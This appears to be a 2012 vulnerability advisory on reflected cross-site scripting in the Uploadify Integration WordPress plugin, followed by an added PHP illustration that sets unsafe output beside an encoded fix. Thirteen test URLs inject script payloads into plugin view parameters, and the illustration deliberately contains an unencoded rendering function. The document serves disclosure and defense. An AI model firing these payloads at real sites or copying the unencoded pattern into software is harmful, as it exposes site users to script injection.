Uploadify Integration 0.9.6 Cross Site Scripting

2012.04.11
Credit: waraxe
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
===============================================================================

Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uploadify Integration allows you to insert a jQuery uploadify uploader into
your forms.
Features: Uses jQuery Uploadify, Automatically saves to post meta, user meta,
an option, or temporary depending on the metaType selected by the shortcode.
Allows more than one shortcode per page.

http://wordpress.org/extend/plugins/uploadify-integration/

Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected is Uploadify Integration 0.9.6, older versions may be affected as well.


###############################################################################
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed


###############################################################################
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed


###############################################################################
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
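
Added example (not part of the advisory and not the plugin's source): a constructed PHP illustration of the pattern named under "Reason" and "Preconditions" above, next to a hardened form. The function names and the view-data array are hypothetical, and extract() stands in for register_globals=On, which was removed in PHP 5.4.

```php
<?php
// Added illustration; NOT the plugin's code. All function names are hypothetical.

// Pattern the advisory describes: a view script prints variables it never
// initialises itself. With register_globals=On, PHP fills those variables
// from GET/POST when the script is requested directly.
// extract() is used here only to emulate that behaviour.
function render_file_partial_unsafe(array $request): string
{
    extract($request);
    return '<input type="hidden" name="' . $inputname . '" value="' . $fileid . '" />';
}

// Encode a value for use inside a double-quoted HTML attribute.
function attr($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Hardened form: values come only from an explicit view-data array,
// default to empty strings, and are encoded at the point of output.
function render_file_partial_safe(array $view): string
{
    $inputname = $view['inputname'] ?? '';
    $fileid    = $view['fileid'] ?? '';
    return '<input type="hidden" name="' . attr($inputname) . '" value="' . attr($fileid) . '" />';
}

// Constructed request, using the test value quoted in the advisory.
$request = [
    'inputname' => 'upload',
    'fileid'    => '"><script>alert(String.fromCharCode(88,83,83))</script>',
];

// Unsafe output: the value closes the attribute and the tag, so the markup
// that follows is parsed by the browser as HTML.
echo render_file_partial_unsafe($request), PHP_EOL;

// Safe output: quotes and angle brackets are emitted as entities, so the
// whole value stays inside the value="" attribute.
echo render_file_partial_safe($request), PHP_EOL;
```

In a WordPress plugin the same encoding is done with esc_attr() at output time. View files can also refuse direct requests with a check such as defined('ABSPATH') || exit; at the top, which removes the direct-access path the tests above rely on.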

References:

http://www.waraxe.us/advisory-85.html

